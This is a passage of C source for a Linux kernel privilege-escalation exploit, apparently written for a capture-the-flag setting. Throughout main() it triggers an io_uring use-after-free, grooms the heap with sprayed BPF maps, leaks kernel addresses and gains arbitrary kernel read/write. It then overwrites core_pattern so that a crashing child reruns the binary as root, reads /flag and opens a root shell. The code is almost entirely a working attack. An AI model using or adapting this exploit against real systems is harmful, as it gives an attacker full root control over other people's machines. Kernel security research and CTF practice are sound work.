    // the map contents are read-only, allowing us to later modify them via UAF.
    for (int i = 0; i < 0x200; i++) { // Spray 0x200 maps
        bpf_map_fd[i] = SYSCHK(setup_bpf_create_mmapable_map(BPF_MAP_TYPE_ARRAY, 4, 0x1000, 1, 0));
    }

    // Freeze all the created BPF maps.
    for (int i = 0; i < 0x200; i++) {
        util_bpf_map_freeze(bpf_map_fd[i]);
        SYSCHK(dup2(bpf_map_fd[i], 0x100)); // Duplicate map FD to 0x100 for BPF program access
        prog_bpf_fds[i][0] = load_leak_bpf_prog(); // Load the leak program
        prog_bpf_fds[i][1] = load_read_write_bpf_prog(); // Load the read/write program
    }
}

int main(int argc, char **argv) {
    setvbuf(stdout, 0, _IONBF, 0); // No-buffered output for easier debugging

    // @step(name="Setup Environment")
    // Set file descriptor limits to avoid issues with many BPF maps
    struct rlimit rlim = {
        .rlim_cur = 0x1000,
        .rlim_max = 0x1000};
    SYSCHK(setrlimit(RLIMIT_NOFILE, &rlim));
    SYSCHK(dup2(0, 0x100)); // Duplicate stdin to FD 0x100. This will be overwritten by BPF map FDs.

    // Child process for root shell execution via core_pattern
    if (argc > 1) {
        // This block is executed by the child process that receives the core dump
        int pid = strtoull(argv[1], 0, 10);
        int pfd = syscall(SYS_pidfd_open, pid, 0);
        int stdinfd = syscall(SYS_pidfd_getfd, pfd, 0, 0);
        int stdoutfd = syscall(SYS_pidfd_getfd, pfd, 1, 0);
        int stderrfd = syscall(SYS_pidfd_getfd, pfd, 2, 0);
        dup2(stdinfd, 0);
        dup2(stdoutfd, 1);
        dup2(stderrfd, 2);
        // Execute the root shell commands.
        system("cat /flag;echo o>/proc/sysrq-trigger"); // Read flag and potentially trigger OOM for cleanup
        execlp("bash", "bash", NULL);
        perror("execlp bash"); // Should not reach here
        exit(1);
    }

    // Parent process (main exploit logic)
    int child_pid = fork();
    if (child_pid == 0) { // First child process, will trigger core dump later
        setup_cpu_affinity(0); // Pin to CPU 0
        setsid(); // Create a new session (important for init namespace root)
        exploit_trigger_core_dump(""); // Check core dump and will trigger crash later
        exit(0);
    }
    setup_cpu_affinity(1); // Pin main exploit process to CPU 1

    // Create a generic array map, dup2'd to 0x101. This map will be used by BPF programs
    // for passing data (kernel addresses, read/write values) between userspace and kernel.
    int output_array_map_fd = setup_bpf_create_map(BPF_MAP_TYPE_ARRAY, 4, 8, 0x10, 0);
    SYSCHK(dup2(output_array_map_fd, 0x101));

    // Fork a child process to run the io_uring vulnerability trigger.
    // The parent process will wait for this child to exit, meaning the UAF has been triggered.
    for (int i = 0;; i++) {
        printf("Try #%d round\n", i);
        setup_cpu_affinity(0); // Child uses CPU 0 for io_uring trigger
        if (fork() == 0)
            break; // Child continues
        wait(0); // Parent waits for child to finish
    }

    // --- io_uring Setup ---
    int pipe_fd[2];
    SYSCHK(pipe(pipe_fd)); // Pipe for io_uring operations

    struct io_uring_params params = {};
    // Setup io_uring with a reasonable number of entries (e.g., 0x8000)
    int uring_fd = SYSCHK(syscall(SYS_io_uring_setup, 0x8000, &params));

    // Mmap io_uring rings (submission queue, completion queue, SQEs)
    unsigned char *sq_ring = SYSCHK(mmap(NULL, params.sq_off.array + params.sq_entries * sizeof(unsigned),
                                         PROT_READ | PROT_WRITE, MAP_SHARED, uring_fd, IORING_OFF_SQ_RING));
    unsigned char *cq_ring = SYSCHK(mmap(NULL, params.cq_off.cqes + params.cq_entries * sizeof(struct io_uring_cqe),
                                         PROT_READ | PROT_WRITE, MAP_SHARED, uring_fd, IORING_OFF_CQ_RING));
    struct io_uring_sqe *sqes = SYSCHK(mmap(NULL, params.sq_entries * sizeof(struct io_uring_sqe),
                                            PROT_READ | PROT_WRITE, MAP_SHARED, uring_fd, IORING_OFF_SQES));

    // Register a dummy file descriptor for io_uring operations
    int dummy_fd = SYSCHK(socket(AF_UNIX, SOCK_STREAM, 0));
    SYSCHK(syscall(__NR_io_uring_register, uring_fd, IORING_REGISTER_FILES, &dummy_fd, 1));

    // Mmap a buffer and an io_uring_buf_ring structure.
    // `res_buffer` will be the actual data buffer, and `ring_buffer` is the metadata.
    char *res_buffer = SYSCHK(mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_SHARED, -1, 0));
    struct io_uring_buf_ring *ring_buffer = SYSCHK(mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_SHARED, -1, 0));

    // @step(name="io_uring Use-After-Free Vulnerability prepare")
    vuln_setup_io_uring_buffer_ring(uring_fd, res_buffer, ring_buffer);

    // @step(name="io_uring Use-After-Free Vulnerability trigger")
    // Trigger the actual UAF by submitting vulnerable operations and unregistering.
    vuln_trigger_io_uring_uaf(uring_fd, pipe_fd[0], sq_ring, sqes, &params);

    // Give some time for kernel internal structures to settle (heuristic)
    sleep(5);

    // @step(name="Heap Grooming and Cross-Cache Attack")
    // Use an array to store BPF map FDs.
    int bpf_map_fd[0x200];
    // Array to store program FDs (leak_prog_fd, rw_prog_fd) for each map
    int prog_bpf_fds[0x200][2];
    spray_cross_cache_bpf_maps(bpf_map_fd, prog_bpf_fds);

    // Write a byte to the pipe to complete the first io_uring operation,
    // which allows the linked vulnerable IORING_OP_READV to finish and trigger UAF.
    SYSCHK(write(pipe_fd[1], tmp_buf, 1));
    // Wait for completion events to ensure the UAF is triggered.
    SYSCHK(syscall(SYS_io_uring_enter, uring_fd, 0, 2, IORING_ENTER_GETEVENTS, NULL, 0));

    // @step(name="BPF Verifier Bypass and Kernel Address Leak")
    int exploit_success = 0;
    int kernel_read_write_prog_fd = -1; // Store the FD of the successful R/W program

    // Iterate through sprayed BPF maps to find the one corrupted by the UAF.
    for (int j = 0; j < 0x200; j++) {
        char *mmaped_addr = SYSCHK(mmap(0, 0x1000, PROT_READ, MAP_SHARED, bpf_map_fd[j], 0));
        // Check if the mmaped region contains the magic value (indicating corruption).
        // The magic value is set by the BPF program during the `skb_load_bytes_relative` read.
        if (memcmp(mmaped_addr, magic, 0x1000) != 0) {
            // Found the corrupted map!
            int array_map_leak_prog_fd = prog_bpf_fds[j][0];
            kernel_read_write_prog_fd = prog_bpf_fds[j][1];

            // Attach the leak BPF program to a socket to trigger its execution
            SYSCHK(socketpair(AF_UNIX, SOCK_DGRAM, 0, sockets));
            SYSCHK(setsockopt(sockets[1], SOL_SOCKET, SO_ATTACH_BPF, &array_map_leak_prog_fd,
                               sizeof(array_map_leak_prog_fd)));
            exploit_success = 1;
            break;
        }
        SYSCHK(munmap(mmaped_addr, 0x1000)); // Unmap if not the target
    }

    if (exploit_success == 0) {
        puts("Failed to find corrupted BPF map. Exiting.");
        exit(0);
    }

    size_t array_map_kernel_addr = 0;
    // Loop until we successfully leak the kernel address of an array map.
    // The BPF program will store this in BPF map element 1 of output_array_map_fd.
LOOP_LEAK:
    for (int i = 0; i < 0x100; i += 8) {
        // Trigger the leak program by sending a byte over the socket
        *(size_t *)(&tmp_buf[8]) = i; // Dummy data for skb_load_bytes_relative
        SYSCHK(write(sockets[0], tmp_buf, 9));
        array_map_kernel_addr = util_get_elem(0x101, 1); // Get the leaked address
        if (array_map_kernel_addr) {
            break;
        }
    }
    if (array_map_kernel_addr == 0) {
        goto LOOP_LEAK; // Retry if leak failed
    }
    printf("Leaked array_map kernel address: 0x%lx\n", array_map_kernel_addr);

    // @step(name="Arbitrary Kernel Read/Write Primitive")
    // Detach the leak program and attach the arbitrary read/write program.
    SYSCHK(socketpair(AF_UNIX, SOCK_DGRAM, 0, sockets)); // New socket pair for the R/W primitive
    SYSCHK(setsockopt(sockets[1], SOL_SOCKET, SO_ATTACH_BPF, &kernel_read_write_prog_fd,
                       sizeof(kernel_read_write_prog_fd)));

    // Calculate kernel base address using the leaked array_map address and a known offset.
    size_t kernel_base = leak_kernel_read64(array_map_kernel_addr) - ARRAY_MAP_OPS_OFFSET;
    printf("Calculated kernel base address: 0x%lx\n", kernel_base);

    // Calculate the address of `core_pattern` in kernel memory.
    size_t core_pattern_addr = kernel_base + CORE_PATTERN_OFFSET;
    printf("core_pattern address: 0x%lx\n", core_pattern_addr);

    // @step(name="Privilege Escalation")
    // Overwrite `core_pattern` with our payload to gain root.
    // The payload `|/proc/%P/fd/666 %P` tells the kernel to execute
    // the program pointed to by FD 666 (our exploit binary) with root privileges
    // when a process crashes, passing the PID as an argument.
    char core_pattern_payload[] = "|/proc/%P/fd/666 %P";
    // Write the payload byte by byte (or 8 bytes at a time) to core_pattern.
    for (int i = 0; i < sizeof(core_pattern_payload); i += sizeof(size_t)) {
        exploit_kernel_write64(core_pattern_addr + i, *(size_t *)(core_pattern_payload + i));
    }
    puts("core_pattern overwritten.");

    // The child process for core dump (created earlier) will now crash.
    // When it crashes, the kernel will execute this exploit binary (via FD 666)
    // with root privileges. The arguments will be the PID of the crashed process.
    // The main function's initial `if (argc > 1)` block handles this.

    // Keep the main process alive to allow the child to call `execve`.
    // It will eventually exit when the shell takes over.
    pause();

    return 0;
}
